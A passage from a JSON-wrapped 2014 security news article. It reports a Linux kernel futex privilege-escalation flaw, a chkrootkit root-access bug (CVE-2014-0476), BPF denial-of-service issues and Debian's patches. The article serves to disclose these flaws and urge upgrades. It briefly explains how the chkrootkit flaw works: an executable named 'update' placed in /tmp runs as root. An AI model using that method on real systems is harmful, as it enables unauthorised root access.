versions_, leaving a queued kernel waiter on the stack, which can be exploited to potentially execute arbitrary code with kernel mode privileges.\n\n> \"_Pinkie Pie discovered an issue in the futex subsystem that allows a local user to gain ring 0 control via the futex syscall,_\" reads the advisory. \"_An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation.\"_\n\n[Pinkie Pie](<https://thehackernews.com/search/label/Pinkie%20Pie%20hacker>) is the anonymous teenage ethical and skilled hacker who scooped at least $100,000 for bypassing the security features of Google's Chrome, many of them sandbox exploits, at both Pwnium and Pwn2Own competitions every year since 2012.\n\n \n\n\n**RESEARCHER\u2019S ADVICE**\n\n_Kees Cook_, a Google Chrome OS security researcher and Ubuntu contributor said that the latest flaw found by Pinkie Pie is \"urgent to fix.\"\n\n> \"_Specifically, the futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0,_\" Cook [wrote](<http://seclists.org/oss-sec/2014/q2/469>) Thursday on Seclists.org. \"_This flaw is especially urgent to fix because futex tends to be available within most Linux sandboxes (because it is used as a glibc pthread primitive)._\"\n\n**CHKROOTKIT - ANOTHER CRITICAL FLAW**\n\nThe vulnerability highlighted two days after Thomas Stangner [reported](<http://www.openwall.com/lists/oss-security/2014/06/04/9>) a serious flaw in the chkrootkit (Check Rootkit), a rootkit detector, that allows a local attacker to gain root access to gain root control by executing malicious code inside the_ /tmp_ directory.\n\n \n\n\nA common Unix-based program, chkrootkit helps system administrators to check their systems for known rootkits. The vulnerability in the chkrootkit, assigned **_CVE-2014-0476_** ID, actually resides in the slapper() function in the shell script chkrootkit package. A non-root user can place any malicious executable file named 'update' in _/tmp_ folder, which will get executed as root whenever chkrootkit will scan this directory for rootkits.\n\n \n\n\n**OTHER VULNERABILITIES IN LINUX KERNEL**\n\nAnother security issues (_**CVE-2014-3144 and CVE-2014-3145**_) also have been discovered in the Linux kernel that could allow any local user to cause a [Denial of Service (DoS) attack](<https://thehackernews.com/search/label/dos%20attack>) via crafted BPF instructions.\n\n \n\n\nDebian has issued the patches for these vulnerabilities and encouraged Linux users to upgrade their Linux packages highlighting that the issue has been fixed in the stable distribution, version 3.2.57-3+deb7u2, and will be fixed in the unstable distribution as soon as possible.\n", "modified": "2014-06-07T11:43:57", "published": "2014-06-07T00:29:00", "id": "THN:B13AEDC0DAC18F19211BE2B4BE0C4787", "href": "https://thehackernews.com/2014/06/linux-kernel-vulnerable-to-privilege_7.html", "type": "thn", "title": "Linux Kernel Vulnerable to Privilege Escalation and DoS Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
